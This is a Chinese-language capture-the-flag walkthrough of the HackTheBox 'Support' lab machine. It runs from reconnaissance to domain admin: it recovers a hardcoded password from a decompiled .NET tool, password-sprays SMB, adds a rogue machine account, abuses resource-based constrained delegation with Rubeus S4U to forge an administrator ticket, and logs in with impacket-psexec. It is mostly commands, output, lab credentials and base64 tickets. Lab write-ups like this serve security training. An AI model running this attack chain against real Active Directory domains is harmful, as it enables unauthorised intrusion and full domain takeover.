目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

将靶机TCP开放端口号提取并保存

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用ldapsearch枚举靶机LDAP服务器根节点信息

使用smbmap通过匿名账户枚举靶机SMB服务共享

使用smbmap枚举support-tools共享内的文件

边界突破

使用Exeinfope查看UserInfo.exe文件编译

使用ILSpy反编译该EXE文件

使用netexec通过该密码与靶机LDAP账户匹配

在Windows环境下执行调试该EXE文件

尝试使用该EXE文件查询用户信息

使用kerbrute通过上述名单枚举靶机域内账户

使用ldapsearch对靶机LDAP服务器信息进行枚举

使用windapsearch对靶机域内用户进行枚举

使用netexec通过上述名单和密码对靶机SMB服务进行密码喷洒

使用evil-winrm通过上述凭证登录靶机Win-RM服务

权限提升

将SharpHound上传至靶机

执行该程序收集靶机域内信息

使用BloodHound对收集数据进行分析

从攻击机中上传并加载PowerView.ps1脚本

将Powermad上传至靶机

在域内新增一个计算机账户

将rubeus上传至靶机

使用rubeus通过S4U攻击模拟管理员身份伪造ST票据

使用impacket-ticketConverter转换该票据

使用impacket-psexec通过administrator票据登录靶机

---

连接至HTB服务器并启动靶机

分配IP：10.10.16.21

靶机IP：10.10.11.174

靶机Domain：support.htb

---

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.11.174 -r 1-65535 --ulimit 5000 | tee res

将靶机TCP开放端口号提取并保存

ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,                                                  
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49678,49701,49739
                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49678,49701,49739

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p$ports -sCV -Pn 10.10.11.174

• 需要重点关注的端口和服务

53端口：Domain服务

88端口：Kerberos服务

389端口：LDAP服务

445端口：SMB服务

5985端口：Win-RM服务

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

nmap -sT -p$ports --script=vuln -O -Pn 10.10.11.174

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn 10.10.11.174

使用ldapsearch枚举靶机LDAP服务器根节点信息

ldapsearch -H ldap://10.10.11.174 -x -s base namingcontexts

使用smbmap通过匿名账户枚举靶机SMB服务共享

smbmap -u guest -H 10.10.11.174

使用smbmap枚举support-tools共享内的文件

smbmap -u guest -H 10.10.11.174 -r support-tools

• 将UserInfo.exe.zip文件下载到攻击机本地

smbmap -u guest -H 10.10.11.174 -r support-tools -A UserInfo.exe.zip -download

• 使用unzip将该压缩包解压

unzip 10.10.11.174-support-tools_UserInfo.exe.zip -d UserInfo

---

边界突破

使用Exeinfope查看UserInfo.exe文件编译

• 由工具输出可知，该EXE可执行文件为.NET框架环境编译执行且未加壳

使用ILSpy反编译该EXE文件

• 由此可得密钥和加密函数，直接扔给大模型修改为Python代码以便编译执行

import base64class Protected:_enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"_key = b"armando"@staticmethoddef get_password():# 解码 Base64 字符串encrypted_data = base64.b64decode(Protected._enc_password)decrypted_data = bytearray(encrypted_data)# 解密过程for i in range(len(decrypted_data)):decrypted_data[i] ^= Protected._key[i % len(Protected._key)] ^ 0xDF# 返回解密后的字符串return decrypted_data.decode('utf-8')# 测试
if __name__ == "__main__":password = Protected.get_password()print("Decrypted Password:", password)

• 直接编译运行获得密码

nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

使用netexec通过该密码与靶机LDAP账户匹配

netexec smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

在Windows环境下执行调试该EXE文件

.\UserInfo.exe find -first *

尝试使用该EXE文件查询用户信息

.\UserInfo.exe user -username langley.lucy

使用kerbrute通过上述名单枚举靶机域内账户

kerbrute userenum -d support.htb --dc 10.10.11.174 ./names.txt

• 很好，全部都是域内用户但暂时没什么用因为可能不齐全

使用ldapsearch对靶机LDAP服务器信息进行枚举

ldapsearch -H ldap://10.10.11.174 -b 'dc=support,dc=htb' -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | grep -C5 'info:'

• 拿到一串看起来像密码的字符串

Ironside47pleasure40Watchful

使用windapsearch对靶机域内用户进行枚举

windapsearch -d support.htb --dc 10.10.11.174 -u 'ldap@support.htb' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -U | grep 'cn:' | cut -d' ' -f2

使用netexec通过上述名单和密码对靶机SMB服务进行密码喷洒

netexec smb 10.10.11.174 -u ./names.txt -p 'Ironside47pleasure40Watchful' --continue-on-success

账户：support

密码：Ironside47pleasure40Watchful

使用evil-winrm通过上述凭证登录靶机Win-RM服务

evil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'

• 在C:\Users\support\Desktop目录下找到user.txt文件

---

权限提升

将SharpHound上传至靶机

upload SharpHound.exe

执行该程序收集靶机域内信息

.\SharpHound.exe -c all

• 将生成的.zip文件下载到攻击机本地

download 20250124070955_BloodHound.zip

使用BloodHound对收集数据进行分析

• 首先查看域管理员

• 查看非约束委派最短系统路径

• 由图标展示可见，当前账户对DC域控制器可进行PS控制

从攻击机中上传并加载PowerView.ps1脚本

. .\PowerView.ps1

• 查询域控制器名、靶机系统版本

Get-DomainController | Select Name,OSVersion | Format-List

*Evil-WinRM* PS C:\ProgramData> Get-DomainController | Select Name,OSVersion | Format-List

Name      : dc.support.htb
OSVersion : Windows Server 2022 Standard

• 查询DC账户Kerberos约束委派信息

Get-DomainComputer DC | Select name,msds-allowedtoactonbehalfofotheridentity

*Evil-WinRM* PS C:\ProgramData> Get-DomainComputer DC | Select name,msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC

• 由输出可见，当前DC账户未被其他计算机账户配置约束委派

将Powermad上传至靶机

upload Powermad.ps1

• 控制靶机加载该脚本

. .\Powermad.ps1

在域内新增一个计算机账户

New-MachineAccount -MachineAccount x0da6h -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force)

*Evil-WinRM* PS C:\ProgramData> New-MachineAccount -MachineAccount x0da6h -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force)
[+] Machine account x0da6h added

• 赋予该计算机账户代表DC的约束委派权限

Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount x0da6h$

• 查询DC可委派的主体

Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount

• 由输出可见，DC已允许x0da6h$进行约束委派

将rubeus上传至靶机

upload Rubeus_x64.exe

• 使用rubeus为伪造的计算机账户x0da6h$生成域内密码哈希

.\Rubeus_x64.exe hash /password:123456 /user:x0da6h$ /domain:support.htb

[*] Action: Calculate Password Hash(es)[*] Input password             : 123456
[*] Input username             : x0da6h$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostx0da6h.support.htb
[*]       rc4_hmac             : 32ED87BDB5FDC5E9CBA88547376818D4
[*]       aes128_cts_hmac_sha1 : 55843795AF436FD006A73ECEDE4C23C3
[*]       aes256_cts_hmac_sha1 : 0FA84858304070B093E0712973F00F1BD075DBE3A59741DBE6B5811CBBFBBF7E
[*]       des_cbc_md5          : DCAD7523D389D054

使用rubeus通过S4U攻击模拟管理员身份伪造ST票据

.\Rubeus_x64.exe s4u /user:x0da6h$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /ptt /nowrap

*Evil-WinRM* PS C:\ProgramData> .\Rubeus_x64.exe s4u /user:x0da6h$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /ptt /nowrap______        _(_____ \      | |_____) )_   _| |__  _____ _   _  ___|  __  /| | | |  _ \| ___ | | | |/___)| |  \ \| |_| | |_) ) ____| |_| |___ ||_|   |_|____/|____/|_____)____/(___/v2.3.2[*] Action: S4U[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'support.htb\x0da6h$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):doIFUjCCBU6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBCUwggQhoAMCARKhAwIBAqKCBBMEggQPhyxlix2lHe/rRq/6CAd4JUBFRyhxUpcnhSk7/8+DnxVqLFTNf3odDJnxP9etEV5xhGdyegJCHRvkb1eZUpW6TZKKiwhSKlfx8OiLfxOAm9En2Ufffcohn/Hg6IPSktaawLTytjHSi1E1YrhbRO3k3/Y3MG+1LZhh2kuAZvA1l+Q5xjRnqhwDsix0RWbwzb9hDr3YnaKxnQzJHSFPuQyXzogurRnEQtwVk+c4AQATty0V6JGRLpBZxvZ0hYwBHgHdYWEqFcIm5S3mNsIWwgEXpYDtXxqV0zyk1ax2RREKpiNCbJ494kpcWBKp/4nmGRH5crxJNn9bPaMUcKwAUqsA5Nus/oJrpubaWurRDLp8hHsqraEofQcbSDGbOKUre5sVN7IztOpgRPxCxx3Pz6Ih/3WMi1NFdbeWwbmKGg2w5ON3TCRDRaMO2pvhaKBEBG8Q7uUeRvx+buC0wven7MoLMG8T3r3I7UL8q6dgQITEXo5pOIjTKQ9/wnGMSiBFvMy6y2b6XZ+AKW6/NKGCvdqS+l3SV51U+YTWm6d3ngJUleeX6cEZiIJCkRHHq8BVE2K2sQN+Ed3ntynab6oFlWJIZMKoBSATqsZ1zrPomL0VnSxxLfTcKHhA4chPKTcbkXvJSwtmNNgcQdzHral4LXBxZOZmlLLQ8X81o+gLy6Uxikhk1/OkMy0IAbu68uGmgTI/h9Qw52h+PKYnbEQQyOEobd8JEKMdT0fwsxOEkQzcJ6ZLP96w5GY79ZM4K94tcEl2AL51fANX2yubL2tgwCYxfpxR6X7LpdQT4E9YBKe6KX6Dw2seFQk3LnfLz5pWpz1umQeBXRcW1YBGLYoqcLTp364G4FinFw/ceXlTi+CFvEpxR3Pm8exIG/t8mQJ6hmwm+d6bCYdw9FVD2LI35ISZr3fr7dRLazW0U7mcLbNHqrr8M/KdYp02ekcy5CPwt1P5c89YWc50eDnmgyeTtTSuwogkEEbayFbkkVRQS7d/XmTQzM23RU1gIwi8qI8+iwmIEl8SzJHYcirzyX+b7+E6qXaCSVHzzMJyOxhscCpruf9NiHDB7yUxnrZCjmDiSHg4czkwgKQhE70m0WQasWpXCl/gAcYVDP6OsChXH015PVECoO+pkY4jfImaJ0OEWb/X/Dx1HXYD4pyroIWsronaAnZHNDAC9AOVLo2SahYFPRfleAK/BzhPi53SxEvksJxhE6m+UZA7wg5cB0mybI3uPZL7ryuumUAXLzW+9kfpHSUw8fdHWdDDU2X+DWlEh7nqLHQW6MulO7ZLEL5fy/Ve9yL91iH378zNbYtm6DR5P2ZPTBhGI3FcXYFu9mG5pVNhXig9PSEpjJx3tdEcOUF3LKXymFmmxMEk+3wVOvrEaaOB0jCBz6ADAgEAooHHBIHEfYHBMIG+oIG7MIG4MIG1oBswGaADAgEXoRIEEKBoFnGD/Hs55p6pHcsvtgqhDRsLU1VQUE9SVC5IVEKiFDASoAMCAQGhCzAJGwd4MGRhNmgkowcDBQBA4QAApREYDzIwMjUwMTI1MDkwOTM3WqYRGA8yMDI1MDEyNTE5MDkzN1qnERgPMjAyNTAyMDEwOTA5MzdaqA0bC1NVUFBPUlQuSFRCqSAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0Yg==[*] Action: S4U[*] Building S4U2self request for: 'x0da6h$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'x0da6h$@SUPPORT.HTB'
[*] base64(ticket.kirbi):doIFojCCBZ6gAwIBBaEDAgEWooIEwTCCBL1hggS5MIIEtaADAgEFoQ0bC1NVUFBPUlQuSFRCohQwEqADAgEBoQswCRsHeDBkYTZoJKOCBIcwggSDoAMCARehAwIBAaKCBHUEggRxr0AdAImZrMCI4ufGHn9IBevujqSPGBWzC/DQnHbOdVq8auEJJ9jEk8mcajMdKXn63FW8p/mNhwtCZQI8HjELanwwZXOKiF1aC6nooWxmGxf3ifzwVstcWx2lhHXPeBObyUMeg4axLQ4LOhXwLffx62QSvAwiZFXAg0tr2lvjf6EB6zHtMgeA435M899zKuHl7JuDpM8KTbH2sIhw1g2Ald4zEqH7cFKwWcN5k5/IpZsBXnAFLi/8vgEtItQgviiuD+fTW9m7lm/WTJLi4zi2kEppXkTvSqZGxjPrMon/2l7LabR6CkfyTW6GjbB3sOt3Cyi2I2J43uSzP27ocwEX0dDRup4kA/WOJhJquzHEFPRf4/F0M0GfwCLcR9QALjwqX4My0OMnXy5hnBqJHPk7SDw+ovFLgF8C/K3IQxFHjD0osXNRVrBvHmCD9Rw3T4Iaaav0fUYmoBpf8/CZdEyRYb+ARut7KUGpJiKj6l+uKCv+h4OowiLYKtsmAy7oTh04DytiSd+SZz8+ECOHimWzWrUjNWU6OCVr7MLwrAx2tq9PFErQ00U7LbKvxA70UxLQevNv40YlZalSMzX5UzFj5SdW1JOPAzeoFVwUZLKg+DcN+6JRnWhwg/4FVdFAjsZ0tV5JuvtNaC4cMCdGgcRmEqKPgm2hD/xo4fBNHHQm9euYmI/I4GjRT0o7g4DQovXiuHdy+zaysGFM8jRlATvYOi1mRnRVMy/oG3sTgmG7bxJQ4JqdM/r68A3NWCbBKWPagY0QyluYjaKOOYo6EforqanY3+LWR44nZAFBq41bqxdLXpBc+UxYDkvozasnMefgfiLiBjJQuhgGKNiPdwY47PFdeYFk4qOf0Tuw2LkWLjz5sgo9BpuKrRuZQDETb2PixR8BPYwQ7lm7soHB5f7Z0VWLkGGq9uWNM+7f+xd3foeV/SkQLtZaRCbvSccyFHGR2gzwNmnk90WAOU8Y+n2ihPrye+VewUDRv8My3k1t67gaz9zLf4HSeA0oR2zPSxQCeJ+Bc1UPN9sAx2Aq4B5Tg9TFnUBeDUDxq8YNr7EkdSiUIDDDAVMLnBCWILwmxnPyyjIgCteECslAW8nsElQcjUrcINrfjrjYBxgKYnhORf7o3b1O9CH6DLpY6xcikP1tJ45JGjuNBfc+0eQ2NxYVX0wKnKMhOYORYJ1ZHrg4Rl39rHQSJkdY9I7xB3bZmdqXpBi0oRjLTGnAo3EDByE6rmCs1i/BwLyOm4F0DgTKKMnDDnAxvR3ULfputthKRHNwVkKwMfdgq6Se8/W6pAs+6UYwsuTH87aTLneQvzjK5XJ9yRY5Gvk85g3qZwJEEdngY3e0XiltzoWDf/LZPqY12fwtCda8OJEVf3xAvdvCgI+QCw5HdoPBUTkzp0tJ3gI604DNMHxWqyWInbGNMGEsGWrosesxj99Ssm7WBH1s/eFanZvXrTA49Nx9CtX4YwIZvu3MoFMku9qt9ddMhAI0ix5ZYv3W5grljhm6R0iKMG+ho4HMMIHJoAMCAQCigcEEgb59gbswgbiggbUwgbIwga+gGzAZoAMCARehEgQQZpeNMgpkTWBVrobSVDrePKENGwtTVVBQT1JULkhUQqIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAEChAAClERgPMjAyNTAxMjUwOTA5MzdaphEYDzIwMjUwMTI1MTkwOTM3WqcRGA8yMDI1MDIwMTA5MDkzN1qoDRsLU1VQUE9SVC5IVEKpFDASoAMCAQGhCzAJGwd4MGRhNmgk[*] Impersonating user 'administrator' to target SPN 'host/dc.support.htb'
[*] Building S4U2proxy request for service: 'host/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'host/dc.support.htb':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
[+] Ticket successfully imported!

• 将票据进行BASE64解码后存入文件中

echo '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' | base64 -d > administrator.kirbi

使用impacket-ticketConverter转换该票据

impacket-ticketConverter administrator.kirbi administrator.ccache

• 使用ntpdate对本地机器与靶机域控制器时间进行校准同步

ntpdate dc.support.htb

使用impacket-psexec通过administrator票据登录靶机

KRB5CCNAME=./administrator.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass

• 在C:\Users\Administrator\Desktop目录下找到root.txt文件